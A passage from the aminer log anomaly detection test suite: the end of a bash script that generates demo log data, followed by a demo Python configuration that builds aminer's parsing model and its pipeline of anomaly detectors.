>> $LOGFILE # RepeatedElementDataModelElement for i in {1..5}; do R=`shuf -i 1-45 -n 1` echo "[drawn number]: $R" | tr -d "\n" >> $LOGFILE done echo "" >> $LOGFILE # VariableByteDataModelElement echo "---------------------------------------------------------------------" >> $LOGFILE # WhiteSpaceLimitedDataModelElement alphabet="abcdefghijklmnopqrstuvwxyz " text="z" for i in {1..1000}; do R=`shuf -i 0-26 -n 1` text=$text${alphabet:R:1} if [ $R -eq 26 ]; then break fi done echo "$text" >> $LOGFILE #Comment #stop aminer sleep 3 & wait $! sudo pkill -x aminer.py wait $PID RES=$? sudo rm $LOGFILE exit $RES logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminer/demo-config.py000066400000000000000000000763121500476301700257520ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = [{'url': b'file:///tmp/syslog', 'parser_id': 'model'}] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. 
Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' config_properties['Core.PersistencePeriod'] = 600 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. 
config_properties['MailAlerting.MinAlertGap'] = 0

# Define the maximum time between two alert e-mails in seconds.
# When undefined this defaults to "MailAlerting.MinAlertGap".
# Otherwise this will activate an exponential backoff to reduce
# messages during permanent error states by increasing the alert
# gap by 50% when more alert-worthy events were recorded while
# the previous gap time was not yet elapsed.
config_properties['MailAlerting.MaxAlertGap'] = 600

# Define how many events should be included in one alert mail
# at most. This defaults to 1000
config_properties['MailAlerting.MaxEventsPerMessage'] = 1000

config_properties['LogPrefix'] = 'Original log line: '
config_properties['Log.StatisticsPeriod'] = 3600
config_properties['Log.StatisticsLevel'] = 1
config_properties['Log.DebugLevel'] = 1
config_properties['Log.Rotation.BackupCount'] = 5
config_properties['Log.Rotation.MaxBytes'] = 104857600  # 100 Megabytes
config_properties['AminerId'] = 'demo-aminer'


# Add your ruleset here:
def build_analysis_pipeline(analysis_context):
    """Build the aminer analysis pipeline for the demo log data.

    The function assembles the parsing model, installs the AtomizerFactory on analysis_context (so aminer knows how to turn the
    incoming byte stream into log atoms) and then registers one instance of each demo analysis component with analysis_context
    while adding it to the shared atom_filter. Handlers are added to atom_filter in the order they appear below; only the two
    unparsed-atom handlers pass an explicit stop_when_handled_flag.

    :param analysis_context: the aminer analysis context; only register_component(), atomizer_factory and aminer_config are used.
    :return: None, the pipeline is attached to analysis_context as a side effect.
    """
    # Shared by the cron, sensor and audit sequences below.
    date_format_string = b'%Y-%m-%d %H:%M:%S'
    cron = b' cron['

    # Build the parsing model:
    import pytz
    from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
    from aminer.parsing.SequenceModelElement import SequenceModelElement
    from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
    from aminer.parsing.FixedDataModelElement import FixedDataModelElement
    from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
    from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
    from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
    from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
    from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement
    from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
    from aminer.parsing.Base64StringModelElement import Base64StringModelElement
    from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement
    from aminer.parsing.HexStringModelElement import HexStringModelElement
    from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
    from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
    from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
    from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement

    service_children_disk_report = [
        FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'),
        DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')]

    # "User <name> logged in|logged out" with an optional " <n> minutes ago." suffix.
    service_children_login_details = [
        FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '),
        FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']),
        OptionalMatchModelElement(
            'PastTime', SequenceModelElement('Time', [
                FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'),
                FixedDataModelElement('Ago', b' minutes ago.')]))]

    service_children_cron_job = [
        DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '),
        DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '),
        DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron),
        DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')]

    service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')]

    service_children_sensors = [
        SequenceModelElement('CPUTemp', [
            FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'),
            FixedDataModelElement('Degrees', b'\xc2\xb0C')]),  # UTF-8 encoded degree sign followed by "C"
        FixedDataModelElement('Space1', b', '),
        SequenceModelElement('CPUWorkload', [
            FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'),
            FixedDataModelElement('Percent', b'%')]),
        FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)]

    service_children_user_ip_address = [
        FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', b' '),
        FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')]

    # Announcement and execution share the same prefix up to the JobNumber; they are correlated by the
    # TimeCorrelationViolationDetector at the end of this function.
    service_children_cron_job_announcement = [
        DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '),
        DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron),
        DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'),
        FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']),
        FixedDataModelElement('StartTime', b'\' in 5 min.')]

    service_children_cron_job_execution = [
        DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '),
        DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron),
        DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'),
        FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']),
        FixedDataModelElement('Started', b'\' started')]

    # Linux audit records: a PATH record is parsed field by field, a SYSCALL record only up to "exit=" and the rest is
    # kept as raw bytes in 'remainding_data'.
    service_children_audit = [
        SequenceModelElement('path', [
            FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'),
            DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='),
            DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'),
            DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='),
            DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='),
            DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='),
            # mode is written with a leading zero (e.g. 0100666), so zero padding must be permitted here.
            DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO),
            FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'),
            FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'),
            FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '),
            FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]),
        SequenceModelElement('syscall', [
            FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'),
            DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='),
            DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='),
            DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='),
            FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='),
            DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]

    # One sample element per parsing model element type; the list is extended step by step below and
    # finally mounted as '/model/ParsingME'.
    service_children_parsing_model_element = [
        DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S', pytz.timezone('UTC')),
        DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'),
        DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'),
        SequenceModelElement('se', [
            DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])]

    # ElementValueBranchModelElement
    fixed_data_me1 = FixedDataModelElement("fixed1", b'match ')
    fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String')
    fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: '])
    decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal")
    # The branch is selected by the index matched by "wordlist": 0 ("data: ") continues with a decimal,
    # 1 ("string: ") with the fixed string.
    service_children_parsing_model_element.append(
        ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [
            SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]),
            SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {
                0: decimal_integer_value_model_element, 1: fixed_data_me2}))
    service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement'))
    service_children_parsing_model_element.append(SequenceModelElement('se2', [
        FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')]))

    # Fall back to en_US.utf8 when the process has no locale configured (e.g. when started by a service manager),
    # otherwise the MultiLocaleDateTimeModelElement would receive "None.None".
    import locale
    loc = locale.getlocale()
    if loc == (None, None):
        loc = ('en_US', 'utf8')
    service_children_parsing_model_element.append(
        MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)]))
    service_children_parsing_model_element.append(
        RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [
            FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '),
            DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1))
    service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#'))
    service_children_parsing_model_element.append(
        SequenceModelElement('se', [
            WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')]))

    # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches.
    service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement'))

    # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets to the
    # AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted.
    service_children_parsing_model_element.append(OptionalMatchModelElement(
        '/', FirstMatchModelElement('FirstMatchModelElement//optional', [
            FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'),
            SequenceModelElement('se', [
                FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])])))

    # One single-byte FixedDataModelElement per letter g..l, named after the letter; they end up as
    # '/model/ECD/g' .. '/model/ECD/l' and are referenced by the sequence detector and the time rules below.
    alphabet = b'ghijkl'
    service_children_ecd = []
    for _, char in enumerate(alphabet):
        char = bytes([char])
        service_children_ecd.append(FixedDataModelElement(char.decode(), char))

    # Root of the parsing model. The child names become the second path component of every match path used below
    # ('/model/DailyCron/DTM', '/model/type/syscall/success', ...).
    parsing_model = FirstMatchModelElement('model', [
        SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement),
        SequenceModelElement('CronExecution', service_children_cron_job_execution),
        SequenceModelElement('DailyCron', service_children_cron_job),
        SequenceModelElement('DiskReport', service_children_disk_report),
        SequenceModelElement('LoginDetails', service_children_login_details),
        DecimalIntegerValueModelElement('Random'),
        SequenceModelElement('RandomTime', service_children_random_time),
        SequenceModelElement('Sensors', service_children_sensors),
        SequenceModelElement('IPAddresses', service_children_user_ip_address),
        FirstMatchModelElement('type', service_children_audit),
        FirstMatchModelElement('ECD', service_children_ecd),
        FirstMatchModelElement('ParsingME', service_children_parsing_model_element)])

    # Some generic imports.
    from aminer.analysis import AtomFilters

    # Create all global handler lists here and append the real handlers later on.
    # Use this filter to distribute all atoms to the analysis handlers.
    atom_filter = AtomFilters.SubhandlerFilter(None)

    # Atoms reach atom_filter only through the timestamp adjuster, which is the handler given to the atomizer factory below.
    from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
    simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter])
    analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust")

    # Every detector below reports into this single list, i.e. to the stream printer only.
    from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
    stream_printer_event_handler = StreamPrinterEventHandler(analysis_context)
    anomaly_event_handlers = [stream_printer_event_handler]

    # Now define the AtomizerFactory using the model. A simple line
    # based one is usually sufficient.
    from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
    analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(
        parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, default_timestamp_path_list=["/model/DailyCron/DTM"],
        use_real_time=True)

    # Just report all unparsed atoms to the event handlers.
    # The simple handler is added with stop_when_handled_flag=False and the verbose one with True; presumably an
    # unparsed atom is therefore reported by both and then not passed on to the detectors below - confirm against
    # SubhandlerFilter.
    from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler
    simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers)
    atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False)
    analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler")

    verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model)
    atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True)
    analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler")

    from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
    timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers)
    atom_filter.add_handler(timestamps_unsorted_detector)
    analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector")

    from aminer.analysis import Rules
    from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector

    # This rule list should trigger, when the line does not look like: User root (logged in, logged out)
    # or User 'username' (logged in, logged out) x minutes ago.
    # The last OrMatchRule branch accepts every atom that is not a LoginDetails match at all, so only LoginDetails
    # lines can violate this allowlist.
    allowlist_rules = [
        Rules.OrMatchRule([
            Rules.AndMatchRule([
                Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'),
                Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')),
                Rules.DebugMatchRule(debug_match_result=True)]),
            Rules.AndMatchRule([
                Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),
                Rules.PathExistsMatchRule('/model/LoginDetails'),
                Rules.DebugMatchRule(debug_match_result=True)]),
            Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])]
    allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers,
                                                              output_logline=True)
    analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist")
    atom_filter.add_handler(allowlist_violation_detector)

    from aminer.analysis.ParserCount import ParserCount
    parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10)
    analysis_context.register_component(parser_count, component_name="ParserCount")
    atom_filter.add_handler(parser_count)

    # etd is shared by the variable type, variable correlation and TSA detectors below.
    from aminer.analysis.EventTypeDetector import EventTypeDetector
    etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers)
    analysis_context.register_component(etd, component_name="EventTypeDetector")
    atom_filter.add_handler(etd)

    from aminer.analysis.VariableTypeDetector import VariableTypeDetector
    vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False,
                               output_logline=False, ignore_list=["/model/RandomTime"])
    analysis_context.register_component(vtd, component_name="VariableTypeDetector")
    atom_filter.add_handler(vtd)

    # NOTE(review): the name vtd is reused for a different detector. Nothing is lost, because the VariableTypeDetector
    # instance was already registered and added above, but a distinct name would make this easier to read.
    from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector
    vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5,
                                      ignore_list=["/model/RandomTime"])
    analysis_context.register_component(vtd, component_name="VariableCorrelationDetector")
    atom_filter.add_handler(vtd)

    from aminer.analysis.TSAArimaDetector import TSAArimaDetector
    tsaad = TSAArimaDetector(analysis_context.aminer_config, anomaly_event_handlers, etd)
    analysis_context.register_component(tsaad, component_name="TSAArimaDetector")
    atom_filter.add_handler(tsaad)

    from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector
    ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True,
                                   hypothesis_max_delta_time=1.0, learn_mode=True)
    analysis_context.register_component(ecd, component_name="EventCorrelationDetector")
    atom_filter.add_handler(ecd)

    from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector
    efd = EventFrequencyDetector(analysis_context.aminer_config, anomaly_event_handlers, window_size=0.5)
    analysis_context.register_component(efd, component_name="EventFrequencyDetector")
    atom_filter.add_handler(efd)

    # The single-letter ECD events, the random values and DailyCron are excluded from sequence learning.
    from aminer.analysis.EventSequenceDetector import EventSequenceDetector
    esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[
        '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime',
        '/model/DailyCron'])
    analysis_context.register_component(esd, component_name="EventSequenceDetector")
    atom_filter.add_handler(esd)

    from aminer.analysis.MatchFilter import MatchFilter
    match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[
        1, 10, 100], output_logline=True)
    analysis_context.register_component(match_filter, component_name="MatchFilter")
    atom_filter.add_handler(match_filter)

    from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
    new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True,
                                                   output_logline=True)
    analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath")
    atom_filter.add_handler(new_match_path_detector)

    def tuple_transformation_function(match_value_list):
        """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.

        Toggles learn_mode on the detector so that it is False exactly when the stored counter for this value tuple is about to
        reach a multiple of 10, and True otherwise. enhanced_new_match_path_value_combo_detector is a late-bound closure variable
        that is assigned right after this definition; presumably the detector only calls this function while processing atoms.

        :param match_value_list: the list of matched values for the configured paths; returned unchanged.
        :return: match_value_list, unmodified.
        """
        extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list))
        if extra_data is not None:
            # extra_data[2] is assumed to be the occurrence count of this tuple - confirm against the detector.
            mod = 10
            if (extra_data[2] + 1) % mod == 0:
                enhanced_new_match_path_value_combo_detector.learn_mode = False
            else:
                enhanced_new_match_path_value_combo_detector.learn_mode = True
        return match_value_list

    from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector
    enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [
        '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True,
        tuple_transformation_function=tuple_transformation_function, output_logline=True)
    analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo")
    atom_filter.add_handler(enhanced_new_match_path_value_combo_detector)

    import re
    # Raised as an event whenever the IPv4InRFC1918MatchRule below matches a private address.
    ip_match_action = Rules.EventGenerationMatchAction(
        "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers)
    vdmt = Rules.ValueDependentModuloTimeMatchRule("vdmtmr", 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3])
    mt = Rules.ModuloTimeMatchRule("mtmr", 3, 0, 3, None)
    # Everything inside the AndMatchRule must hold for an atom to be allowed; the three NegationMatchRules
    # therefore turn the listed IP values and a failed syscall into allowlist violations.
    time_allowlist_rules = [
        Rules.AndMatchRule([
            Rules.ParallelMatchRule([
                Rules.ValueDependentDelegatedMatchRule([
                    '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], {
                        (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt}, mt),
                Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action),
                Rules.DebugHistoryMatchRule(debug_match_result=True)
            ]),
            # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed
            # (134744072 == 8.8.8.8, 134743044 == 8.8.4.4, 167772160 == 10.0.0.0, 184549375 == 10.255.255.255 as 32-bit integers).
            Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])),
            Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)),
            # An audit SYSCALL record with success=no is not allowed either.
            Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$")))
        ])
    ]
    time_allowlist_violation_detector = AllowlistViolationDetector(
        analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist")
    atom_filter.add_handler(time_allowlist_violation_detector)

    from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \
        PathDependentHistogramAnalysis
    # 86400 and 3600 presumably mean "modulo one day, one bin per hour" (24 bins) - confirm against ModuloTimeBinDefinition.
    modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True)
    linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True)
    histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [
        ('/model/RandomTime/Random', modulo_time_bin_definition),
        ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis")
    atom_filter.add_handler(histogram_analysis)

    path_dependent_histogram_analysis = PathDependentHistogramAnalysis(
        analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis")
    atom_filter.add_handler(path_dependent_histogram_analysis)

    from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector
    match_value_average_change_detector = MatchValueAverageChangeDetector(
        analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10, output_logline=True)
    analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange")
    atom_filter.add_handler(match_value_average_change_detector)

    # Writes the three sensor values of each Sensors line to the process's own stdout; b';' and b'' are presumably the
    # field separator and the marker for a missing value - confirm against MatchValueStreamWriter.
    import sys
    from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter
    match_value_stream_writer = MatchValueStreamWriter(
        sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'')
    analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter")
    atom_filter.add_handler(match_value_stream_writer)

    # log_resource_ignore_list names a resource that is not in config_properties['LogResourceList']; it only demonstrates
    # the parameter.
    from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
    new_match_path_value_combo_detector = NewMatchPathValueComboDetector(
        analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers,
        output_logline=True, learn_mode=True, log_resource_ignore_list=['file:///tmp/other_syslog'])
    analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo")
    atom_filter.add_handler(new_match_path_value_combo_detector)

    # Joins audit PATH and SYSCALL records that carry the same audit id (the '/model/type/*/id' paths) into one combo;
    # allow_missing_values_flag=True because either record type may arrive without its counterpart.
    from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector
    new_match_id_value_combo_detector = NewMatchIdValueComboDetector(
        analysis_context.aminer_config, ['/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers,
        id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True,
        allow_missing_values_flag=True, output_logline=True)
    analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector")
    atom_filter.add_handler(new_match_id_value_combo_detector)

    from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
    new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [
        '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True)
    analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue")
    atom_filter.add_handler(new_match_path_value_detector)

    from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector
    missing_match_path_value_detector = MissingMatchPathValueDetector(
        analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2,
        realert_interval=5, output_logline=True)
    analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch")
    atom_filter.add_handler(missing_match_path_value_detector)

    from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector
    time_correlation_detector = TimeCorrelationDetector(
        analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5,
        record_count_before_event=10000, output_logline=True)
    analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector")
    atom_filter.add_handler(time_correlation_detector)

    # A CronAnnouncement with a given JobNumber must be followed by a CronExecution with the same JobNumber; the values 5 and 6
    # presumably bound the accepted delay in seconds between the two - confirm against CorrelationRule.
    from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector
    cron_job_announcement = CorrelationRule(
        'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')])
